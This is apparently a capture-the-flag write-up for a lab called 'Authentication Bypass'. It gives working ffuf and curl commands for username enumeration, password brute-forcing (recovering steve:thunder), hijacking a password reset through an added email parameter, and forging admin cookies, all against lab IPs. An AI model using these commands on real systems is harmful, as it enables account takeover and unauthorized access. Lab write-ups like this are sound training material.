Authentication Bypass

February 23, 2024

Task 1:

Task 2:

For this task we have to look for the sign up section of the website then we are going to test some username into the username section

As we try using the username admin the system says that it is already existing in the database

Therefore we are going to use FFUF tool to bruteforce some username that is already existing in the database, so that we have a baseline what username we will be using to attack the system

We are going to use the names.txt from seclists wordlist and then use the error message to look for the possible username that is exisiting

The error message that we are going to use is "An account with this username already exists".

ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.18.15/customers/signup -mr "An account with this username already exists"

As we see above these 3 username are already exisiting in the database. The usernames are robert, simon, and steve.

Task 3:

Then we are going to save those 3 usernames to a text file, so that we can use them as a file to bruteforce the password for those usernames

Here we are going to use that text file containing the three username which the file name is "valid_usernames.txt". Then for the password list that we selected the 10-million-password-list-top-100 in the seclists directory

We are going to pass the parameters into the website which is the username variable and password variable.

You can find the variable names in the source code

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.18.15/customers/login -fc 200

Then after you run the tool you can see here the result that the username steve have a password thunder

If you login using the credentials you can see nothing in this account

Task 4:

Therefore, we are going to create our own account so that we can see use it later. The format of email address is the important thing here. {username}@customer.acmeitsupport.thm

Here we are requesting a reset password but if we input a invalid email address it will return this error

But since we know that there is a username robert we can try to use it and request for reset password for that user. The email address is actually given in the room but we can still think or assume that the email address are related to the name of company.

For that reason we conclude upon using {usernme}@customer.acmeitsupport.thm

Like robert@acmeitsupport.thm and robert for the username parameter but as we curl the request.

We are going to input another parameter which is email, that will change the supposedly receiving email to our modified email

So instead of robert that will receive reset password request, we are going to get that request in our own ticket system which is kyou

curl 'http://10.10.103.145/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=kyou@customer.acmeitsupport.thm'

We logged in as kyou

Then you can see here in the kyou user we have the password reset request that will open the user robert without password needed

After you go to that URL here we are as user robert then when you go to the support tickets #1 you will see the flag.

Task 5:

curl http://10.10.69.244/cookie-test

curl -H "Cookie: logged_in=true; admin=true" http://10.10.69.244/cookie-test